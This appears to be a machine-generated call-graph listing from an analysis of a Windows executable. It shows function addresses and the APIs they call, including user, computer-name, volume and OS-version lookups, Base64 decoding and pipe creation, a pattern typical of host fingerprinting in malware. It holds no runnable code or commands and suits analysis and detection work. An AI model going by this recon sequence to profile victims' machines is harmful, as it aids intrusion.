free _Receive_impl 4882->4884 4885 7ff65e1f1a6e _invalid_parameter_noinfo_noreturn 4882->4885 5247 7ff65e1f30a0 4882->5247 5267 7ff65e1f32e0 4882->5267 4883->4885 4884->4882 4885->4868 4888 7ff65e1f86e7 4887->4888 4893 7ff65e1f860f 4887->4893 4889 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4888->4889 4891 7ff65e1f86fb 4889->4891 4891->4699 4894 7ff65e1f8668 4893->4894 4896 7ff65e1f8710 4893->4896 4897 7ff65e1f8649 4893->4897 4901 7ff65e1f8715 4893->4901 4902 7ff65e1f8653 4893->4902 4895 7ff65e1fd9f0 4 API calls 4894->4895 4895->4902 4898 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4896->4898 4900 7ff65e1fd9f0 4 API calls 4897->4900 4898->4901 4899 7ff65e1f2a40 13 API calls 4899->4902 4903 7ff65e1f864e 4900->4903 5283 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 4901->5283 4902->4888 4902->4899 4903->4902 4904 7ff65e1f8661 _invalid_parameter_noinfo_noreturn 4903->4904 4904->4894 4906 7ff65e1f34a0 8 API calls 4905->4906 4907 7ff65e1f7108 4906->4907 5284 7ff65e1f6000 4907->5284 4910 7ff65e1f715c 5307 7ff65e1fa640 4910->5307 4911 7ff65e1f7157 4914 7ff65e1fda34 _Receive_impl free 4911->4914 4913 7ff65e1f7150 _invalid_parameter_noinfo_noreturn 4913->4911 4914->4910 4916 7ff65e1fd9f0 4 API calls 4917 7ff65e1f71b2 4916->4917 4918 7ff65e1f34a0 8 API calls 4917->4918 4919 7ff65e1f71f0 4918->4919 5348 7ff65e1f6440 4919->5348 4923 7ff65e1f7266 4924 7ff65e1f8e00 55 API calls 4923->4924 4925 7ff65e1f72cc 4924->4925 4926 7ff65e1f8e00 55 API calls 4925->4926 4927 7ff65e1f7317 4926->4927 4928 7ff65e1fa640 20 API calls 4927->4928 4929 7ff65e1f7366 4928->4929 4930 7ff65e1fa640 20 API calls 4929->4930 4931 7ff65e1f7396 6 API calls 4930->4931 4932 7ff65e1f74b0 4931->4932 4932->4932 5468 7ff65e1fb100 4932->5468 4935 7ff65e1f759b 4936 7ff65e1fa640 20 API calls 4935->4936 4938 7ff65e1f75bf 4936->4938 4937 7ff65e1f30a0 9 API calls 4937->4935 4939 7ff65e1fd9f0 4 API calls 4938->4939 4940 7ff65e1f75ce 4939->4940 4941 7ff65e1f34a0 8 API calls 4940->4941 4942 
7ff65e1f7613 4941->4942 5495 7ff65e1fc6e0 4942->5495 4945 7ff65e1f763a 4947 7ff65e1f7db4 4945->4947 4948 7ff65e1f7652 4945->4948 4946 7ff65e1fd9f0 4 API calls 4946->4945 5579 7ff65e1fb3b0 4947->5579 4949 7ff65e1f7685 4948->4949 4951 7ff65e1f767d 4948->4951 4952 7ff65e1f7687 4948->4952 4950 7ff65e1f34a0 8 API calls 4949->4950 4955 7ff65e1f76dd 4950->4955 5564 7ff65e1fcb90 4951->5564 4952->4949 5572 7ff65e1f9f80 4952->5572 4957 7ff65e1fc6e0 50 API calls 4955->4957 4960 7ff65e1f76ea 4957->4960 4962 7ff65e1fa640 20 API calls 4960->4962 4964 7ff65e1f771a 4962->4964 4963 7ff65e1f7dfb 5615 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 4963->5615 5520 7ff65e1f8ae0 memset 4964->5520 4967 7ff65e1f7e00 4968 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4967->4968 4975 7ff65e1f7e05 4968->4975 4969 7ff65e1f7875 4969->4963 4978 7ff65e1f788f 4969->4978 4970 7ff65e1f7730 4970->4969 4972 7ff65e1f3200 13 API calls 4970->4972 4980 7ff65e1f35a0 9 API calls 4970->4980 4971 7ff65e1f7946 memmove 4974 7ff65e1f3200 13 API calls 4971->4974 4972->4970 4973 7ff65e1f78d4 4981 7ff65e1fd9f0 4 API calls 4973->4981 4976 7ff65e1f79ae 4974->4976 4979 7ff65e1f83b8 4975->4979 4984 7ff65e1f34a0 8 API calls 4975->4984 4982 7ff65e1f3200 13 API calls 4976->4982 4977 7ff65e1f78f2 4977->4971 4978->4967 4978->4971 4978->4973 4978->4977 4983 7ff65e1f7939 4978->4983 4985 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4979->4985 4980->4970 4986 7ff65e1f78ed 4981->4986 4987 7ff65e1f7a0b 4982->4987 4988 7ff65e1fd9f0 4 API calls 4983->4988 4989 7ff65e1f7e84 GetUserNameW 4984->4989 4990 7ff65e1f83c7 4985->4990 4986->4977 4991 7ff65e1f7932 _invalid_parameter_noinfo_noreturn 4986->4991 4992 7ff65e1f7a8b 4987->4992 4995 7ff65e1f7a86 4987->4995 4998 7ff65e1f7a7f _invalid_parameter_noinfo_noreturn 4987->4998 4988->4977 4993 7ff65e1f21a0 10 API calls 4989->4993 4990->4707 4991->4983 4996 7ff65e1f7ad6 4992->4996 5000 7ff65e1f7ad1 4992->5000 5004 7ff65e1f7aca _invalid_parameter_noinfo_noreturn 
4992->5004 4994 7ff65e1f7eaf 4993->4994 5002 7ff65e1f2cc0 42 API calls 4994->5002 4999 7ff65e1fda34 _Receive_impl free 4995->4999 5534 7ff65e1f61c0 CreatePipe 4996->5534 4998->4995 4999->4992 5001 7ff65e1fda34 _Receive_impl free 5000->5001 5001->4996 5005 7ff65e1f7edf 5002->5005 5004->5000 5007 7ff65e1f20b0 _Receive_impl 2 API calls 5005->5007 5006 7ff65e1f4530 9 API calls 5008 7ff65e1f7b1c 5006->5008 5009 7ff65e1f7eec 5007->5009 5550 7ff65e1f3ac0 5008->5550 5011 7ff65e1f34a0 8 API calls 5009->5011 5013 7ff65e1f7f15 GetComputerNameW 5011->5013 5016 7ff65e1f21a0 10 API calls 5013->5016 5014 7ff65e1f7b65 5017 7ff65e1f7b98 5014->5017 5021 7ff65e1f7b91 _invalid_parameter_noinfo_noreturn 5014->5021 5015 7ff65e1f7b9d 5018 7ff65e1f7bff 5015->5018 5023 7ff65e1f7bfa 5015->5023 5024 7ff65e1f7bf3 _invalid_parameter_noinfo_noreturn 5015->5024 5020 7ff65e1f7f40 5016->5020 5022 7ff65e1fda34 _Receive_impl free 5017->5022 5019 7ff65e1f7c56 5018->5019 5026 7ff65e1f7c51 5018->5026 5029 7ff65e1f7c4a _invalid_parameter_noinfo_noreturn 5018->5029 5027 7ff65e1f7cb8 5019->5027 5031 7ff65e1f7cb3 5019->5031 5034 7ff65e1f7cac _invalid_parameter_noinfo_noreturn 5019->5034 5032 7ff65e1f2cc0 42 API calls 5020->5032 5021->5017 5022->5015 5025 7ff65e1fda34 _Receive_impl free 5023->5025 5024->5023 5025->5018 5030 7ff65e1fda34 _Receive_impl free 5026->5030 5028 7ff65e1f2870 _Receive_impl 4 API calls 5027->5028 5033 7ff65e1f7d03 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5028->5033 5029->5026 5030->5019 5035 7ff65e1fda34 _Receive_impl free 5031->5035 5036 7ff65e1f7f70 5032->5036 5037 7ff65e1fa640 20 API calls 5033->5037 5034->5031 5035->5027 5038 7ff65e1f20b0 _Receive_impl 2 API calls 5036->5038 5040 7ff65e1f7d35 5037->5040 5039 7ff65e1f7f7d 5038->5039 5041 7ff65e1f34a0 8 API calls 5039->5041 5042 7ff65e1f7d7c 5040->5042 5044 7ff65e1f7d77 5040->5044 5047 7ff65e1f7d70 _invalid_parameter_noinfo_noreturn 5040->5047 5043 7ff65e1f7fa6 
5041->5043 5045 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5042->5045 5046 7ff65e1f1450 38 API calls 5043->5046 5048 7ff65e1fda34 _Receive_impl free 5044->5048 5049 7ff65e1f7d8d 5045->5049 5050 7ff65e1f7fb0 5046->5050 5047->5044 5048->5042 5049->4707 5051 7ff65e1f34a0 8 API calls 5050->5051 5052 7ff65e1f7fd9 GetVolumeInformationW 5051->5052 5053 7ff65e1f808e 5052->5053 5054 7ff65e1f8029 5052->5054 5055 7ff65e1f34a0 8 API calls 5053->5055 5077 7ff65e1f808c 5053->5077 5056 7ff65e1f3280 __stdio_common_vswprintf_s 5054->5056 5055->5077 5058 7ff65e1f8043 5056->5058 5057 7ff65e1f34a0 8 API calls 5059 7ff65e1f80dc memset GetVersionExW 5057->5059 5060 7ff65e1f21a0 10 API calls 5058->5060 5061 7ff65e1f8113 GetModuleHandleW GetProcAddress 5059->5061 5062 7ff65e1f810c 5059->5062 5063 7ff65e1f804f 5060->5063 5064 7ff65e1f8135 5061->5064 5065 7ff65e1f8139 5061->5065 5066 7ff65e1f8195 5062->5066 5067 7ff65e1f81e3 5062->5067 5068 7ff65e1f2cc0 42 API calls 5063->5068 5064->5062 5076 7ff65e1f1390 __stdio_common_vswprintf 5065->5076 5071 7ff65e1f21a0 10 API calls 5066->5071 5069 7ff65e1f81e1 5067->5069 5070 7ff65e1f34a0 8 API calls 5067->5070 5072 7ff65e1f807f 5068->5072 5074 7ff65e1f34a0 8 API calls 5069->5074 5070->5069 5075 7ff65e1f81a1 5071->5075 5073 7ff65e1f20b0 _Receive_impl 2 API calls 5072->5073 5073->5077 5078 7ff65e1f8249 5074->5078 5080 7ff65e1f2cc0 42 API calls 5075->5080 5076->5064 5077->5057 5079 7ff65e1f1780 52 API calls 5078->5079 5081 7ff65e1f8256 5079->5081 5082 7ff65e1f81d4 5080->5082 5083 7ff65e1f85b0 23 API calls 5081->5083 5084 7ff65e1f20b0 _Receive_impl 2 API calls 5082->5084 5085 7ff65e1f828f 5083->5085 5084->5069 5086 7ff65e1f34a0 8 API calls 5085->5086 5087 7ff65e1f82da 5086->5087 5088 7ff65e1f70a0 204 API calls 5087->5088 5093 7ff65e1f82ed 5088->5093 5089 7ff65e1f8342 5090 7ff65e1f8395 5089->5090 5091 7ff65e1f8390 5089->5091 5094 7ff65e1f8389 _invalid_parameter_noinfo_noreturn 5089->5094 5092 7ff65e1f9ea0 24 API calls 5090->5092 5096 
7ff65e1fda34 _Receive_impl free 5091->5096 5092->4979 5093->5089 5093->5094 5095 7ff65e1fda34 _Receive_impl free 5093->5095 5094->5091 5095->5089 5096->5090 5890 7ff65e1f1010 5097->5890 5099 7ff65e1f32a6 __stdio_common_vswprintf_s 5099->4673 5101 7ff65e1f13ce 5100->5101 5103 7ff65e1f13b3 5100->5103 5102 7ff65e1f13e8 __stdio_common_vswprintf 5101->5102 5102->5103 5103->4679 5105 7ff65e1f9eb9 5104->5105 5112 7ff65e1f9f33 5104->5112 5106 7ff65e1f9ed8 5105->5106 5891 7ff65e1f83e0 5105->5891 5108 7ff65e1f9f28 5106->5108 5109 7ff65e1f9f4b _invalid_parameter_noinfo_noreturn 5106->5109 5110 7ff65e1fda34 _Receive_impl free 5108->5110 5111 7ff65e1fa640 20 API calls 5109->5111 5110->5112 5113 7ff65e1f9f70 5111->5113 5112->4642 5113->4642 5116 7ff65e1f35d0 5115->5116 5117 7ff65e1f36f9 5115->5117 5121 7ff65e1f3660 5116->5121 5122 7ff65e1f3628 5116->5122 5123 7ff65e1f361b 5116->5123 5127 7ff65e1f3635 5116->5127 5203 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5117->5203 5119 7ff65e1f36fe 5124 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5119->5124 5120 7ff65e1fd9f0 4 API calls 5120->5123 5129 7ff65e1fd9f0 4 API calls 5121->5129 5122->5119 5122->5127 5125 7ff65e1f367c memmove 5123->5125 5126 7ff65e1f36c7 memmove 5123->5126 5128 7ff65e1f36c0 _invalid_parameter_noinfo_noreturn 5123->5128 5130 7ff65e1f3704 5124->5130 5131 7ff65e1f369e 5125->5131 5132 7ff65e1f36b3 5125->5132 5133 7ff65e1f36be 5126->5133 5127->5120 5128->5126 5129->5123 5131->5128 5131->5132 5134 7ff65e1fda34 _Receive_impl free 5132->5134 5133->4813 5134->5133 5136 7ff65e1f3a39 5135->5136 5139 7ff65e1f38f8 5135->5139 5204 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5136->5204 5138 7ff65e1f3a3e 5141 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5138->5141 5142 7ff65e1f3950 5139->5142 5143 7ff65e1f3988 5139->5143 5147 7ff65e1f395d 5139->5147 5150 7ff65e1f3943 5139->5150 5140 7ff65e1fd9f0 4 API calls 5140->5150 5144 7ff65e1f3a44 ?uncaught_exceptions@std@ 5141->5144 5142->5138 
5142->5147 5149 7ff65e1fd9f0 4 API calls 5143->5149 5151 7ff65e1f3a63 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5144->5151 5152 7ff65e1f3a6d 5144->5152 5145 7ff65e1f39fc 5156 7ff65e1f3a04 memmove 5145->5156 5146 7ff65e1f39a8 memmove memmove 5153 7ff65e1f39d3 5146->5153 5154 7ff65e1f39e8 5146->5154 5147->5140 5148 7ff65e1f39f5 _invalid_parameter_noinfo_noreturn 5148->5145 5149->5150 5150->5145 5150->5146 5150->5148 5151->5152 5152->4813 5153->5148 5153->5154 5155 7ff65e1fda34 _Receive_impl free 5154->5155 5157 7ff65e1f39f3 5155->5157 5156->5157 5157->4813 5159 7ff65e1f38a6 5158->5159 5162 7ff65e1f373f 5158->5162 5205 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5159->5205 5161 7ff65e1f38ab 5166 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5161->5166 5164 7ff65e1f379c 5162->5164 5165 7ff65e1f37d8 5162->5165 5170 7ff65e1f37a9 5162->5170 5171 7ff65e1f378f 5162->5171 5163 7ff65e1fd9f0 4 API calls 5163->5171 5164->5161 5164->5170 5173 7ff65e1fd9f0 4 API calls 5165->5173 5169 7ff65e1f38b1 5166->5169 5167 7ff65e1f3862 memmove 5177 7ff65e1f3859 5167->5177 5168 7ff65e1f380d memmove memset 5174 7ff65e1f384e 5168->5174 5175 7ff65e1f3839 5168->5175 5170->5163 5171->5167 5171->5168 5172 7ff65e1f385b _invalid_parameter_noinfo_noreturn 5171->5172 5172->5167 5173->5171 5176 7ff65e1fda34 _Receive_impl free 5174->5176 5175->5172 5175->5174 5176->5177 5177->4813 5179 7ff65e1f2a6e 5178->5179 5180 7ff65e1f2a84 5179->5180 5181 7ff65e1f2b49 5179->5181 5182 7ff65e1f2a8a 5180->5182 5184 7ff65e1f2b4e 5180->5184 5185 7ff65e1f2b1e memmove 5180->5185 5186 7ff65e1f2aba 5180->5186 5187 7ff65e1f2b19 5180->5187 5206 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5181->5206 5182->4815 5188 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5184->5188 5185->4815 5189 7ff65e1fd9f0 4 API calls 5186->5189 5190 7ff65e1fd9f0 4 API calls 5187->5190 5191 7ff65e1f2b54 5188->5191 5192 7ff65e1f2ad0 5189->5192 5190->5185 5207 7ff65e1f2870 5191->5207 5194 7ff65e1f2b12 
_invalid_parameter_noinfo_noreturn 5192->5194 5195 7ff65e1f2ad8 5192->5195 5194->5187 5195->5185 5197 7ff65e1f2bca 5199 7ff65e1fda34 _Receive_impl free 5197->5199 5198 7ff65e1f2bdb 5198->4815 5199->5198 5217 7ff65e1f1250 __std_exception_copy 5200->5217 5208 7ff65e1f28df ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 5207->5208 5213 7ff65e1f2889 5207->5213 5209 7ff65e1f2920 _invalid_parameter_noinfo_noreturn 5208->5209 5210 7ff65e1f2974 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5209->5210 5211 7ff65e1f2943 5209->5211 5210->5197 5210->5198 5212 7ff65e1f296c 5211->5212 5214 7ff65e1f298b _invalid_parameter_noinfo_noreturn 5211->5214 5215 7ff65e1fda34 _Receive_impl free 5212->5215 5213->5209 5216 7ff65e1fda34 _Receive_impl free 5213->5216 5215->5210 5216->5208 5218 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5217->5218 5219 7ff65e1f12b2 _CxxThrowException __std_exception_copy 5218->5219 5219->4806 5221 7ff65e1f3262 5220->5221 5222 7ff65e1f3223 memmove 5220->5222 5223 7ff65e1f38c0 12 API calls 5221->5223 5222->4858 5225 7ff65e1f3275 5223->5225 5225->4858 5227 7ff65e1f3cb0 5226->5227 5228 7ff65e1f3de8 5226->5228 5232 7ff65e1f3d40 5227->5232 5233 7ff65e1f3d08 5227->5233 5234 7ff65e1f3cfb 5227->5234 5238 7ff65e1f3d15 5227->5238 5246 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5228->5246 5230 7ff65e1f3ded 5235 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5230->5235 5231 7ff65e1fd9f0 4 API calls 5231->5234 5240 7ff65e1fd9f0 4 API calls 5232->5240 5233->5230 5233->5238 5236 7ff65e1f3db4 memmove memmove 5234->5236 5237 7ff65e1f3d67 memmove memmove 5234->5237 5239 7ff65e1f3dad _invalid_parameter_noinfo_noreturn 5234->5239 5241 7ff65e1f3df3 5235->5241 5244 7ff65e1f3dab 5236->5244 5242 7ff65e1f3da0 5237->5242 5243 7ff65e1f3d8b 5237->5243 5238->5231 5239->5236 5240->5234 5245 7ff65e1fda34 _Receive_impl free 5242->5245 5243->5239 5243->5242 5244->4839 5245->5244 5248 7ff65e1f30bd 
memmove 5247->5248 5249 7ff65e1f30e7 5247->5249 5248->4882 5251 7ff65e1f31ec 5249->5251 5253 7ff65e1f3141 5249->5253 5257 7ff65e1f3179 5249->5257 5258 7ff65e1f3133 5249->5258 5282 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5251->5282 5254 7ff65e1f31f1 5253->5254 5255 7ff65e1fd9f0 4 API calls 5253->5255 5259 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5254->5259 5255->5258 5256 7ff65e1f3181 memmove 5262 7ff65e1f31a2 5256->5262 5263 7ff65e1f31cf 5256->5263 5261 7ff65e1fd9f0 4 API calls 5257->5261 5258->5256 5264 7ff65e1f31e5 _invalid_parameter_noinfo_noreturn 5258->5264 5260 7ff65e1f31f7 5259->5260 5261->5258 5262->5264 5265 7ff65e1f31c7 5262->5265 5263->4882 5264->5251 5266 7ff65e1fda34 _Receive_impl free 5265->5266 5266->5263 5268 7ff65e1f331f ?good@ios_base@std@ 5267->5268 5269 7ff65e1f3318 5267->5269 5270 7ff65e1f3333 5268->5270 5277 7ff65e1f3361 5268->5277 5269->5268 5274 7ff65e1f3349 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5270->5274 5270->5277 5271 7ff65e1f343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5272 7ff65e1f3474 5271->5272 5273 7ff65e1f346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5271->5273 5272->4882 5273->5272 5274->5277 5275 7ff65e1f33d4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5276 7ff65e1f33f4 5275->5276 5278 7ff65e1f342a 5276->5278 5281 7ff65e1f33fd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5276->5281 5277->5271 5277->5275 5277->5278 5279 7ff65e1f33a4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5277->5279 5280 7ff65e1f33d1 5277->5280 5278->5271 5279->5277 5280->5275 5281->5276 5285 7ff65e1f6045 CryptStringToBinaryA 5284->5285 5286 7ff65e1f6042 5284->5286 5287 7ff65e1f6073 5285->5287 5288 7ff65e1f619b 5285->5288 5286->5285 5290 7ff65e1f60b0 CryptStringToBinaryA 5287->5290 5616 7ff65e1fc8d0 5287->5616 5289 7ff65e1f11e0 9 API calls 5288->5289 5291 7ff65e1f61ac 
_CxxThrowException 5289->5291 5294 7ff65e1f60ed 5290->5294 5295 7ff65e1f6178 5290->5295 5297 7ff65e1f34a0 8 API calls 5294->5297 5632 7ff65e1f11e0 __std_exception_copy 5295->5632 5296 7ff65e1f6098 memset 5296->5290 5299 7ff65e1f610d 5297->5299 5301 7ff65e1f614d 5299->5301 5302 7ff65e1f6148 5299->5302 5304 7ff65e1f6141 _invalid_parameter_noinfo_noreturn 5299->5304 5303 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5301->5303 5305 7ff65e1fda34 _Receive_impl free 5302->5305 5306 7ff65e1f6160 5303->5306 5304->5302 5305->5301 5306->4910 5306->4911 5306->4913 5308 7ff65e1fa67d 5307->5308 5309 7ff65e1faad9 5308->5309 5310 7ff65e1fa73d 5308->5310 5311 7ff65e1fa6b7 5308->5311 5334 7ff65e1fa9be 5308->5334 5312 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5309->5312 5315 7ff65e1fab03 5310->5315 5316 7ff65e1fa759 5310->5316 5338 7ff65e1fa766 5310->5338 5313 7ff65e1fa6e7 5311->5313 5311->5315 5319 7ff65e1fa6da 5311->5319 5314 7ff65e1f7195 5312->5314 5347 7ff65e1fa734 5313->5347 5646 7ff65e1fccf0 5313->5646 5314->4916 5678 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 5315->5678 5324 7ff65e1fc3a0 5 API calls 5316->5324 5317 7ff65e1fa9e1 5321 7ff65e1faa9b 5317->5321 5327 7ff65e1faa45 5317->5327 5336 7ff65e1fa9ef 5317->5336 5318 7ff65e1faaaa 5323 7ff65e1fc470 19 API calls 5318->5323 5636 7ff65e1fc3a0 5319->5636 5328 7ff65e1faee0 19 API calls 5321->5328 5330 7ff65e1faabf 5323->5330 5324->5338 5325 7ff65e1fa9b5 5670 7ff65e1faee0 5325->5670 5335 7ff65e1faa76 5327->5335 5339 7ff65e1faa94 _invalid_parameter_noinfo_noreturn 5327->5339 5343 7ff65e1faa30 5327->5343 5328->5343 5333 7ff65e1fda34 _Receive_impl free 5330->5333 5332 7ff65e1fccf0 19 API calls 5332->5338 5333->5343 5334->5309 5334->5317 5334->5318 5340 7ff65e1fda34 _Receive_impl free 5335->5340 5336->5309 5337 7ff65e1faa28 5336->5337 5336->5339 5336->5343 5342 7ff65e1fda34 _Receive_impl free 5337->5342 5338->5332 5338->5347 5339->5321 5340->5343 5341 7ff65e1fda34 _Receive_impl free 5341->5309 5342->5343 
5343->5341 5344 7ff65e1f7080 19 API calls 5344->5347 5346 7ff65e1fccf0 19 API calls 5346->5347 5347->5325 5347->5344 5347->5346 5662 7ff65e1fc470 5347->5662 5349 7ff65e1fa640 20 API calls 5348->5349 5350 7ff65e1f64bd 5349->5350 5351 7ff65e1fd9f0 4 API calls 5350->5351 5352 7ff65e1f64d5 5351->5352 5353 7ff65e1f34a0 8 API calls 5352->5353 5354 7ff65e1f6510 5353->5354 5355 7ff65e1fa640 20 API calls 5354->5355 5356 7ff65e1f6538 5355->5356 5357 7ff65e1f8e00 55 API calls 5356->5357 5358 7ff65e1f657f 5357->5358 5359 7ff65e1fa640 20 API calls 5358->5359 5360 7ff65e1f65ab 5359->5360 5361 7ff65e1fd9f0 4 API calls 5360->5361 5362 7ff65e1f65c3 5361->5362 5363 7ff65e1f34a0 8 API calls 5362->5363 5364 7ff65e1f65fe 5363->5364 5365 7ff65e1fa640 20 API calls 5364->5365 5366 7ff65e1f662c 5365->5366 5691 7ff65e1fbc80 5366->5691 5369 7ff65e1f8e00 55 API calls 5370 7ff65e1f6678 5369->5370 5371 7ff65e1fa640 20 API calls 5370->5371 5372 7ff65e1f66a4 5371->5372 5373 7ff65e1fd9f0 4 API calls 5372->5373 5374 7ff65e1f66bc 5373->5374 5375 7ff65e1f34a0 8 API calls 5374->5375 5376 7ff65e1f66f7 5375->5376 5698 7ff65e1f8dd0 5376->5698 5378 7ff65e1f671e 5701 7ff65e1f8550 5378->5701 5382 7ff65e1f677b 5383 7ff65e1faf70 20 API calls 5382->5383 5384 7ff65e1f678f 5383->5384 5385 7ff65e1fb050 28 API calls 5384->5385 5386 7ff65e1f67a0 5385->5386 5387 7ff65e1f8550 55 API calls 5386->5387 5388 7ff65e1f67df 5387->5388 5389 7ff65e1f8550 55 API calls 5388->5389 5390 7ff65e1f681e 5389->5390 5391 7ff65e1f8550 55 API calls 5390->5391 5392 7ff65e1f685d 5391->5392 5393 7ff65e1f8e00 55 API calls 5392->5393 5394 7ff65e1f689b 5393->5394 5395 7ff65e1fa640 20 API calls 5394->5395 5428 7ff65e1f694e 5395->5428 5396 7ff65e1f6e07 5397 7ff65e1fa640 20 API calls 5396->5397 5423 7ff65e1f6ffd 5396->5423 5400 7ff65e1f6e47 5397->5400 5398 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5399 7ff65e1f7049 5398->5399 5429 7ff65e1f8e00 5399->5429 5402 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 
5400->5402 5401 7ff65e1fc6e0 50 API calls 5401->5428 5403 7ff65e1f6e60 5402->5403 5404 7ff65e1f34a0 8 API calls 5403->5404 5405 7ff65e1f6e9b 5404->5405 5406 7ff65e1fa640 20 API calls 5405->5406 5407 7ff65e1f6ed0 5406->5407 5408 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5407->5408 5409 7ff65e1f6ee9 5408->5409 5410 7ff65e1f2a40 13 API calls 5409->5410 5411 7ff65e1f6f0d 5410->5411 5412 7ff65e1f8e00 55 API calls 5411->5412 5413 7ff65e1f6f53 5412->5413 5414 7ff65e1f8e00 55 API calls 5413->5414 5416 7ff65e1f6f92 5414->5416 5415 7ff65e1f2a40 13 API calls 5415->5428 5417 7ff65e1f34a0 8 API calls 5416->5417 5419 7ff65e1f6fc6 5417->5419 5418 7ff65e1f8e00 55 API calls 5418->5428 5420 7ff65e1fc6e0 50 API calls 5419->5420 5421 7ff65e1f6fd5 5420->5421 5422 7ff65e1fa640 20 API calls 5421->5422 5422->5423 5423->5398 5424 7ff65e1f34a0 8 API calls 5424->5428 5425 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5425->5428 5426 7ff65e1fa640 20 API calls 5426->5428 5427 7ff65e1f8720 71 API calls 5427->5428 5428->5396 5428->5401 5428->5415 5428->5418 5428->5424 5428->5425 5428->5426 5428->5427 5430 7ff65e1f8e5b 5429->5430 5431 7ff65e1f9056 5430->5431 5433 7ff65e1f8eff 5430->5433 5432 7ff65e1fd9f0 4 API calls 5431->5432 5434 7ff65e1f906c 5432->5434 5706 7ff65e1fbc00 5433->5706 5436 7ff65e1f9051 5434->5436 5725 7ff65e1fd610 5434->5725 5439 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5436->5439 5438 7ff65e1f90b1 5438->5436 5443 7ff65e1fab10 8 API calls 5438->5443 5440 7ff65e1f9118 5439->5440 5440->4923 5443->5438 5445 7ff65e1f9133 5739 7ff65e1f5680 ?_Xlength_error@std@@YAXPEBD 5445->5739 5447 7ff65e1fd9f0 4 API calls 5448 7ff65e1f8f09 5447->5448 5448->5436 5448->5445 5448->5447 5449 7ff65e1fa640 20 API calls 5448->5449 5713 7ff65e1fab10 5448->5713 5717 7ff65e1fd320 5448->5717 5721 7ff65e1fd540 5448->5721 5449->5448 5450 7ff65e1f9138 5451 7ff65e1fb3b0 16 API calls 5450->5451 5452 7ff65e1f9150 5451->5452 5741 7ff65e1fbff0 5452->5741 5455 
7ff65e1f91b1 5457 7ff65e1f91d6 5455->5457 5458 7ff65e1f91f1 _invalid_parameter_noinfo_noreturn 5455->5458 5456 7ff65e1f91de 5456->4923 5459 7ff65e1fda34 _Receive_impl free 5457->5459 5460 7ff65e1f7080 20 API calls 5458->5460 5459->5456 5461 7ff65e1f9212 5460->5461 5462 7ff65e1f9248 5461->5462 5463 7ff65e1f9240 5461->5463 5464 7ff65e1f9261 _invalid_parameter_noinfo_noreturn 5461->5464 5462->4923 5465 7ff65e1fda34 _Receive_impl free 5463->5465 5769 7ff65e1f92a0 __std_exception_copy __std_exception_copy 5464->5769 5465->5462 5467 7ff65e1f927e 5467->4923 5469 7ff65e1fb14e ?good@ios_base@std@ 5468->5469 5470 7ff65e1fb147 5468->5470 5471 7ff65e1fb190 5469->5471 5472 7ff65e1fb162 5469->5472 5470->5469 5473 7ff65e1fb19e ?getloc@ios_base@std@@QEBA?AVlocale@2 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5471->5473 5474 7ff65e1fb346 ?uncaught_exceptions@std@ 5471->5474 5472->5471 5475 7ff65e1fb178 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5472->5475 5478 7ff65e1fb1f8 5473->5478 5476 7ff65e1fb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5474->5476 5477 7ff65e1fb35a 5474->5477 5475->5471 5476->5477 5482 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5477->5482 5479 7ff65e1fb280 ??1_Lockit@std@@QEAA 5478->5479 5480 7ff65e1fb21b 5478->5480 5481 7ff65e1fb20f ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5478->5481 5483 7ff65e1fb2b6 ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3 5479->5483 5493 7ff65e1fb299 5479->5493 5480->5479 5487 7ff65e1fb235 